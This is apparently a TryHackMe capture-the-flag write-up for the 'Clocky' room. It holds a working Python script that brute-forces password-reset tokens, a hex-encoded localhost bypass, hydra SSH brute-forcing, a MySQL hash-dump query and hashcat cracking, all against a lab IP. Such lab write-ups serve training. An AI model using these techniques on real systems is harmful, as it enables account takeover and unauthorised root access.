Task 1 Pwn the Clock and Gain Root Access
- What is flag 1?
THM{REDACTED}
- What is flag 2?
THM{REDACTED}
- What is flag 3?
THM{REDACTED}
- What is flag 4?
THM{REDACTED}
- What is flag 5?
THM{REDACTED}
- What is flag 6?
THM{REDACTED}
Enumeration
hengkisirait: Clocky $ nmap -T4 -Pn 10.10.236.199
22/tcp open ssh syn-ack
80/tcp open http syn-ack
8000/tcp open http-alt syn-ack
8080/tcp open http-proxy syn-ack
User-agent: *
Disallow: /*.sql$
Disallow: /*.zip$
Disallow: /*.bak$
Flag 1: THM{REDACTED}
hengkisirait: Clocky $ gobuster dir -u http://10.10.236.199:8000 -w ~/HackTools/directory-list-2.3-medium.txt -x "sql,zip,bak,txt"
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.236.199:8000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /Users/hengkisirait/HackTools/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: sql,zip,bak,txt
[+] Timeout: 10s
===============================================================
2024/04/01 22:00:48 Starting gobuster in directory enumeration mode
===============================================================
/index.zip (Status: 200) [Size: 1922]
- Extract the zip, analyze the app.py and create the python to brute the token for reset password
#!/usr/bin/env python3
import requests
import hashlib
import datetime
from time import gmtime, strftime
forgot_pass = "http://10.10.236.199:8080/forgot_password"
reset_pass = "http://10.10.236.199:8080/password_reset?token="
fp_data = {
'username':'administrator'
}
fp = requests.post(forgot_pass, data=fp_data)
# Splitting to get time from server
time =fp.headers['Date'].split(' ')
# Splitting datetimenow to get the date
value = str(datetime.datetime.now()).split(" ")[0]
def resetPassword(token):
rp = requests.get(reset_pass+token)
if("Invalid token" not in rp.text):
print(f"[+] Found Token: {token}")
return True
else:
print(f"[+] failed {token}")
return False
# Brute the milliseconds
for milli_seconds in range(100):
ms = f"{milli_seconds:02}"
full_time = value + " " +time[4]+"."+ms
lnk = full_time + " . ADMINISTRATOR"
token = hashlib.sha1(lnk.encode("utf-8")).hexdigest()
if(resetPassword(token)):
break
Go to the http://10.10.236.199:8080/password_reset?token=[TOKEN-HERE]and reset the password
After resetting the password login to http://10.10.236.199:8080/administrator with password you
set
Encode the URL Localhost using hex 127.0.0.1 as 0x7f 00 00 01 and try
http://0x7f000001/database.sql to get database.sql
After analyzing the database collect any creds we got from app.py and database.sql use that to brute SSH
#################################################
# #
# Flag 4: THM{REDACTED} #
# #
#################################################
CREATE DATABASE IF NOT EXISTS clocky;
USE clocky;
-- CREATE USER IF NOT EXISTS 'clocky_user'@'localhost' IDENTIFIED BY '!WE_LOVE_CLEARTEXT_DB_PASSWORDS!';
-- GRANT ALL PRIVILEGES ON *.* TO 'clocky_user'@'localhost' WITH GRANT OPTION;
-- CREATE USER IF NOT EXISTS 'clocky_user'@'%' IDENTIFIED BY '!WE_LOVE_CLEARTEXT_DB_PASSWORDS!';
-- GRANT ALL PRIVILEGES ON *.* TO 'clocky_user'@'%' WITH GRANT OPTION;
-- FLUSH PRIVILEGES;
-- SET FOREIGN_KEY_CHECKS=0;
DROP TABLE IF EXISTS users;
DROP TABLE IF EXISTS passwords;
/*
DROP TABLE IF EXISTS reset_token;
*/
CREATE TABLE users(
ID INT AUTO_INCREMENT UNIQUE NOT NULL PRIMARY KEY,
username VARCHAR(50) UNIQUE NOT NULL,
Created timestamp default current_timestamp );
INSERT INTO users (username) VALUES ("administrator");
CREATE TABLE passwords(
ID INT AUTO_INCREMENT NOT NULL,
password VARCHAR(256) NOT NULL,
FOREIGN KEY (ID) REFERENCES users(ID) );
INSERT INTO passwords (password) VALUES ("REDACTED");
/* Do we actually need this part anymore?
I've updated app.py to not use this due to brute force errors
CREATE TABLE reset_token(
ID INT AUTO_INCREMENT NOT NULL,
username VARCHAR(50) UNIQUE NOT NULL,
token VARCHAR(128) UNIQUE,
FOREIGN KEY (ID) REFERENCES users(ID) );
### TEST TOKEN ###
INSERT INTO reset_token (username, token) VALUES ("administrator", "WyJhZG1pbmlzdHJhdG9yIl0.hFrZoI0BzkqoI01vfOL13haqpwY");
*/
Try to brute the ssh using hydra
hengkisirait: Clocky $ hydra -L user.txt -p "REDACTED" 10.10.236.199 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 23:11:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:4/p:1), ~1 try per task
[DATA] attacking ssh://10.10.236.199:22/
[22][ssh] host: 10.10.236.199 login: clarice password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 23:11:45
- SSH To server using cred
clarice:REDACTED
clarice@clocky:~$ cat flag5.txt
THM{REDACTED}
Privilege Escalation
╔══════════╣ Analyzing Env Files (limit 70)
-rw-rw-r-- 1 clarice clarice 20 May 21 2023 /home/clarice/app/.env
db=REDACTED
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| clocky |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.10 sec)
- Dump mysql password be sure to check the MYSQL Version
SELECT user,CONCAT('$mysql',LEFT(authentication_string,6),'*',INSERT(HEX(SUBSTR(authentication_string,8)),41,0,'*')) AS hash FROM mysql.user WHERE plugin = 'caching_sha2_password' AND authentication_string NOT LIKE '%INVALIDSALTANDPASSWORD%' AND authentication_string !='';
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
| user | hash |
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
| clocky_user | $mysql$A$005*077E1B6B675D350F435D5D1C686D12566C08635A*5566386F49543936423756525A68516962735568536535654B62486D344C71316B7338707A78446B4E4D39 |
| dev | $mysql$A$005*0D172F787569054E322523067049563540383D17*6F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142 |
| clocky_user | $mysql$A$005*63671A7C5C3E425E3A0C794352306B531456162B*58774E44786D326C44443557334A39353531676A6C566D4F5A395A39684832537A61696C786D32566B4C2E |
| debian-sys-maint | $mysql$A$005*456268331A4E3561236636480E4D3F78462A7553*716A4E6262555947697444712F79464C4D384C62617544683833517472615161455479366E5A5774576332 |
| dev | $mysql$A$005*1C160A38777C5121134E5D725A58216D5A1D5C3F*6F6B2F577851456465524C4E6771587057456634734A6F6E5A656361774655697A4438466F6B654935462E |
+------------------+----------------------------------------------------------------------------------------------------------------------------------------------+
┌──(lodwig㉿kali)-[~]
└─$ hashcat -m 7401 clock_hash /usr/share/wordlists/rockyou.txt --show
$mysql$A$005*0D172F787569054E322523067049563540383D17*6F31786178584431332F4D6830726C6C6F652F5771636D6D6142444D46367237776A764647676F54536142:REDACTED
clarice@clocky:/dev/shm$ su
Password:
root@clocky:/dev# cd /root
root@clocky:~# ls
flag6.txt snap
root@clocky:~# cat flag6.txt
THM{REDACTED}